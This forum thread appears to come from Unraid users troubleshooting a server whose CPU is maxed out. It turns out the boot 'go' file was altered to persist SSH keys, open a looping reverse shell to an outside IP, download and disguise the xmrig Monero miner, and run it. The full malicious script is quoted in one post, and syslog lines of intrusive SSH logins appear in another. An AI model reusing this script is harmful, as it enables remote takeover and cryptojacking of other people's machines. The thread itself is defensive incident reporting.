JackDewhurst Posted February 4, 2021 Share Posted February 4, 2021 (edited) Hi all, Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists. Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something? Edited March 17, 2021 by JackDewhurst Updated Title Quote Link to comment
trurl Posted February 4, 2021 Share Posted February 4, 2021 Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread. Quote Link to comment
JackDewhurst Posted February 4, 2021 Author Share Posted February 4, 2021 Hi trurl, sure here are the diagnostics. server-diagnostics-20210204-1839.zip Quote Link to comment
trurl Posted February 5, 2021 Share Posted February 5, 2021 23 hours ago, JackDewhurst said: tried stopping all docker apps and arrays And the few plugins you have I don't think use that so I don't know why it would still be running. Quote Link to comment
JackDewhurst Posted February 5, 2021 Author Share Posted February 5, 2021 I can kill it with kill -9 pid and it doesn't seem to have any detrimental effect on the system. Will just do this for the time being till I work out what the cause is. Quote Link to comment
JackDewhurst Posted March 17, 2021 Author Share Posted March 17, 2021 On 2/5/2021 at 3:03 PM, trurl said: And the few plugins you have I don't think use that so I don't know why it would still be running. Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below: #!/bin/bash # Start the Management Utility /usr/local/sbin/emhttp & mkdir /root/.ssh chmod 700 /root/.ssh cp /boot/config/ssh/authorized_keys /root/.ssh/ chmod 600 /root/.ssh/authorized_keys nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6> cd /dev/shm wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li> tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz cd xmrig-6.7.0/ mv xmrig /usr/bin/mysql_daemon mkdir -p /etc/mysql/conf.d echo '{ "autosave": true, "background": true, "cpu": { "enabled": true, "max-threads-hint": 50 }, "max-cpu-usage": 25, "cpu-priority": 1, "opencl": false, "cuda": false, "pools": [ { "url": "pool.minexmr.com:443", "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB> "keepalive": true, "tls": true } ] }' > /etc/mysql/conf.d/.config.json /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B rm -r /dev/shm/xmrig-6.7.0 rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc.. Quote Link to comment
BRiT Posted March 17, 2021 Share Posted March 17, 2021 This is why no one should set up their servers to be exposed to the internet. 1 Quote Link to comment
JackDewhurst Posted March 17, 2021 Author Share Posted March 17, 2021 (edited) I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr Edited March 17, 2021 by JackDewhurst 1 Quote Link to comment
itimpi Posted March 17, 2021 Share Posted March 17, 2021 13 hours ago, JackDewhurst said: I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr Are you sure you have not opened up any inbound ports on your router or put unRaid into the DMZ? Normally a router will block all inbound connections by default. 1 Quote Link to comment
trurl Posted March 26, 2021 Share Posted March 26, 2021 @JackDewhurst On 3/17/2021 at 8:26 AM, BRiT said: This is why no one should set up their servers to be exposed to the internet. Now that we are more attuned to these sorts of things lately, I went back and looked at OP diagnostics. Here are some excerpts from syslog: Feb 4 10:38:38 Bruce-Willis sshd[1956]: Accepted none for adm from 109.236.89.61 port 10163 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[1957]: Accepted none for adm from 51.77.66.36 port 21574 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[2003]: Accepted none for adm from 89.39.105.84 port 12355 ssh2 Feb 4 10:38:38 Bruce-Willis sshd[2097]: Accepted none for adm from 190.2.144.45 port 44237 ssh2 Feb 4 10:38:43 Bruce-Willis sshd[2371]: Invalid user tech from 196.89.145.142 port 61652 Feb 4 10:38:47 Bruce-Willis sshd[2369]: Failed password for root from 192.42.116.28 port 57396 ssh2 Feb 4 10:38:54 Bruce-Willis sshd[5195]: Accepted none for adm from 194.88.107.164 port 8746 ssh2 Feb 4 10:38:58 Bruce-Willis sshd[4618]: Failed password for root from 77.247.181.163 port 17784 ssh2 Feb 4 10:39:10 Bruce-Willis sshd[6513]: Accepted none for adm from 178.128.95.213 port 60574 ssh2 Feb 4 10:39:10 Bruce-Willis sshd[6254]: Failed password for root from 91.192.103.34 port 38220 ssh2 Feb 4 10:39:28 Bruce-Willis sshd[6724]: Failed password for root from 185.220.102.242 port 15016 ssh2 https://www.abuseipdb.com/check/109.236.89.61 Netherlands https://www.abuseipdb.com/check/51.77.66.36 Germany https://www.abuseipdb.com/check/192.42.116.28 Netherlands https://www.abuseipdb.com/check/77.247.181.163 Netherlands https://www.abuseipdb.com/check/91.192.103.34 Switzerland https://www.abuseipdb.com/check/185.220.102.242 Netherlands Quote Link to comment
trurl Posted March 26, 2021 Share Posted March 26, 2021 1 hour ago, jakehaas said: my Unraid machine is also doing the exact same thing @jakehaas Go to Tools - Diagnostics and attach the complete Diagnostics ZIP file to your NEXT post in this thread. Quote Link to comment
Squid Posted March 26, 2021 Share Posted March 26, 2021 9 hours ago, jakehaas said: My home network has no ports forwarded from outside. Unlikely for this to have happened. You've probably at least forwarded 32400 for Plex, but a shortcut people take when they don't understand how to forward a port is to simply place a server within a DMZ... Alternatively, one of your clients has been hijacked Quote Link to comment
docbrown Posted April 8, 2021 Share Posted April 8, 2021 (edited) Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router. my admin account password is very complex as well Edited April 8, 2021 by docbrown Quote Link to comment
itimpi Posted April 8, 2021 Share Posted April 8, 2021 5 minutes ago, docbrown said: Just did a reboot today for the first time in a few weeks, and when it booted up I had the same issue as above. Go file was set to mine crypto. Looked through my router ports that were open and the only one I had open that was out of the ordinary was I had 4433 pointing to 443 when I was trying to get the myservers plug in to work as I had trouble with my Eeros mesh router. my admin account password is very complex as well Sounds bad if you cannot track down where this is coming from. I would be worried that you have some other device on your local LAN (or your router) compromised and that is the way that the someone is getting into your system. The other issue is how are they getting to the flash drive to change it? Is the flash drive shared on the network so that it can be accessed from another machine/device. I would recommend it is not shared on the network unless needed and definitely do not have it shared as a public share so anyone can change its content. Quote Link to comment
docbrown Posted April 8, 2021 Share Posted April 8, 2021 (edited) 13 minutes ago, itimpi said: Is the flash drive shared on the network… Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui Edit: Main tab - Flash durrr Edited April 8, 2021 by docbrown Quote Link to comment
itimpi Posted April 8, 2021 Share Posted April 8, 2021 1 hour ago, docbrown said: Hmm yes i can access it on the network but it doesn’t appear under the shares tab in the unraid ui Edit: Main tab - Flash durrr Click on the flash drive on the Main tab I've often thought to myself that it should also be listed under the Disk Shares part of the Shares tab as that is a more 'discoverable' location. 1 Quote Link to comment
BRiT Posted April 8, 2021 Share Posted April 8, 2021 Make sure to look at all your extras and plugins on the flash as well as dockers to make sure its not self-reinstalling on shutdown or restarts. Quote Link to comment
squirrellydw Posted April 10, 2021 Share Posted April 10, 2021 (edited) I think someone mention this before but this is could be the issue. Docker Hub Images With Malicious Monero Money Miners? Edited April 10, 2021 by squirrellydw Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.